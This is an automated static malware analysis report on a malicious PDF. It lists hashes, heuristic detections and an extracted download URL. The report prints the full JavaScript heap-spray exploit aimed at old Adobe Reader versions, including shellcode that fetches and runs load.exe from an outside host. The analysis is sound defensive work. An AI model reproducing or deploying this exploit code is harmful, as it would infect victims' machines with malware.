Malicious PDF — malware analysis report

Static analysis result for SHA-256 42b5b174d6769279…

MALICIOUS

PDF

2.8 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 91acd9adfdd063be4fe3efec24917bea SHA-1: d1158fd63d5f0020e8e5c926abcffb2e7974bf4f SHA-256: 42b5b174d67692792e359ea710e267f761b1dfbccd6b5451a0000a4091b1aa8b
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The JavaScript stream is obfuscated, as suggested by the PDF_UNESCAPE firing and the 'Script obfuscation indicators' signal. The primary IOC is the extracted JavaScript file itself. The obfuscated nature of the script prevents a more detailed analysis of its specific actions, but its presence within a PDF strongly suggests an attempt to deliver a malicious payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
       var ZwyjxfBEVj4WzI = 0x0c0c0c0c;
   var YD5DH3Hbh = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7 …
   var GKE2YjkbGktlF = 0x400000;
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://buterik.com/123/load.exe Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36A 2918 bytes
SHA-256: a007b6a55e9cac12e5223a4f6a8954606e9bca8d191a57700ad06f95a3a0f60a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function xAWZdld86Pbw() {	var gF07YAiQwEf = new Array(); 
		function V0NLFh8(mh4zKA5, Z2hRGqYp2GFx) { 
			while (mh4zKA5.length*2<Z2hRGqYp2GFx){mh4zKA5 += mh4zKA5;} 
			mh4zKA5 = mh4zKA5.substring(0,Z2hRGqYp2GFx/2);
			return mh4zKA5; 
		}

		function Lai5x5JeCjstnr() { 
			var ZwyjxfBEVj4WzI = 0x0c0c0c0c; 
			var YD5DH3Hbh = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941%u0B27%u613E%u86F9%u1111%u9811%u0D54%uD49A%uD192%u9841%u3154%uEE79%u1111%u4111%u549A%u7B05%u4813%u449A%uF909%u1170%u1111%u5412%uD631%u4D11%u3F6F%uD674%u1551%u7469%u1111%u64EE%u9A31%u1D54%u107B%u9A48%u0944%u51F9%u1111%u7B11%u4916%u5412%u2235%u42CA%uEE42%u3164%u4241%u549A%u7B0D%u4814%u449A%uF909%u1132%u1111%u117B%u64EE%u9A31%u1954%u137B%u9A48%u0944%u01F9%u1111%u7B11%u9AEE%u0154%u107B%u9A48%u0944%u11F9%u1111%u5011%u434A%uF012%uF012%uF012%uF012%uFD92%u4B15%u9A42%uF3CB%u43E6%uF1EE%u9A44%u9AFD%u196C%u4C9A%u471D%u629A%u9A2D%u0F65%u1269%u47E2%u679A%u1231%u22E2%u58D8%uBC50%uD212%u2247%u1EE7%u01AF%uE32B%u1965%uDFD0%u121C%u51E3%uE0FA%uEF2A%u644F%u4BF4%uFA9A%u4B9A%u1235%u77CC%u1D9A%u9A5A%u0D4B%uCC12%u159A%u129A%u4FD4%uD34C%u1119%uE5F9%uEEEF%u44EE%u5D43%u5E5C%u115F%u7468%u7074%u2F3A%u622F%u7475%u7265%u6B69%u632E%u6D6F%u312F%u3332%u6C2F%u616F%u2E64%u7865%u0065");
			var GKE2YjkbGktlF = 0x400000;
			var JSPsk1ZDL9bTZ = YD5DH3Hbh.length * 2;
			var Z2hRGqYp2GFx = GKE2YjkbGktlF - (JSPsk1ZDL9bTZ+0x38);
			var mh4zKA5 = unescape("%u9090%u9090");
			mh4zKA5 = V0NLFh8(mh4zKA5, Z2hRGqYp2GFx);
			var VwkOGyPoiA = (ZwyjxfBEVj4WzI - 0x400000)/GKE2YjkbGktlF;
			
			for (var dZN8Qa6M=0;dZN8Qa6M<VwkOGyPoiA;dZN8Qa6M++) { 
				gF07YAiQwEf[dZN8Qa6M] = mh4zKA5 + YD5DH3Hbh;
			}
		}

		function KvJkBRadqSNr2b() {
			var jCgkOF = app.viewerVersion.toString();
			jCgkOF = jCgkOF.replace(/\D/g,"");
			var sdw84l = new Array(jCgkOF.charAt(0),jCgkOF.charAt(1),jCgkOF.charAt(2));
			var yrpBXZZmGjQCqU = "c8o8l5l555e2c424t234534E6ma45678il31In1f3457o";
			if ((sdw84l[0] == 8 &&
			((sdw84l[1] == 1 && sdw84l[2] < 2) || sdw84l[1] < 1)) || 
			(sdw84l[0] == 7 && sdw84l[1] < 1) || 
			(sdw84l[0] < 7)) {
			        var iymdMe = Collab;
				Lai5x5JeCjstnr();
				var xBpAVaL = unescape("%u0c0c%u0c0c");
				var wj0Xtf8EbIDO = "c24ol2la572bS8to2445r5e00";
				while(xBpAVaL.length < 44952) xBpAVaL += xBpAVaL;
				this[wj0Xtf8EbIDO.replace(new RegExp(/\d/g),"")] = iymdMe[yrpBXZZmGjQCqU.replace(new RegExp(/\d/g),"")](                  {subj:            "",        msg:              xBpAVaL});
			} 
		}
		KvJkBRadqSNr2b();}
javascript_obj0013_001_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 13 at offset 0x36A 444 bytes
SHA-256: bcb2470f54ff4d180f2f1d8ee994554fbbb7541e67bae743de98e7713ac34a25

Open this report in the interactive analyzer, or submit your own file for analysis.